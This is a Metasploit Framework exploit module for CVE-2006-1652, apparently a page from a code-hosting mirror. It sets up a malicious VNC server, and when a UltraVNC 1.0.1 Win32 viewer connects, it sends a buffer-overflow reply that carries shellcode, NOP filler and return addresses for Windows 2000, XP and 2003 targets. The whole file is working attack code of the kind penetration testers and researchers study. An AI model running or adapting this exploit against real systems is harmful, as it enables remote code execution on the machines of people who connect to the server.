CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/vnc/ultravnc_client.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::TcpServer

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'UltraVNC 1.0.1 Client Buffer Overflow',

14
      'Description'    => %q{

15
        This module exploits a buffer overflow in UltraVNC Win32

16
        Viewer 1.0.1 Release.

17
      },

18
      'Author'         => 'MC',

19
      'License'        => MSF_LICENSE,

20
      'References'     =>

21
        [

22
          [ 'CVE', '2006-1652' ],

23
          [ 'OSVDB', '24456' ],

24
          [ 'BID', '17378' ],

25
        ],

26
      'DefaultOptions' =>

27
        {

28
          'EXITFUNC' => 'thread',

29
        },

30
      'Payload'        =>

31
        {

32
          'Space'    => 500,

33
          'BadChars' => "\x00",

34
          'MaxNops'  => 0,

35
          'StackAdjustment' => -3500,

36
        },

37
      'Platform'       => 'win',

38
      'Targets'        =>

39
        [

40
          [ 'Windows 2000 SP4 English',	{ 'Ret' => 0x7c2ec68b } ],

41
          [ 'Windows XP SP2 English',	{ 'Ret' => 0x77dc15c0 } ],

42
          [ 'Windows 2003 SP1 English',	{ 'Ret' => 0x76aa679b } ],

43
        ],

44
      'Privileged'     => false,

45
      'DisclosureDate' => '2006-04-04',

46
      'DefaultTarget'  => 0))

47


48
    register_options(

49
      [

50
        OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])

51
      ])

52
  end

53


54
  def on_client_connect(client)

55


56
    rfb = "RFB 003.006\n"

57


58
    client.put(rfb)

59
  end

60


61
  def on_client_data(client)

62
    return if ((p = regenerate_payload(client)) == nil)

63


64
    filler = make_nops(980 - payload.encoded.length)

65


66
    sploit =  "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"

67
    sploit << payload.encoded + filler + [target.ret].pack('V')

68
    sploit << "PASSWORD" + [0xe8, -997].pack('CV')

69


70
    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")

71
    client.put(sploit)

72


73
    handler

74
    service.close_client(client)

75
  end

76
end

77


78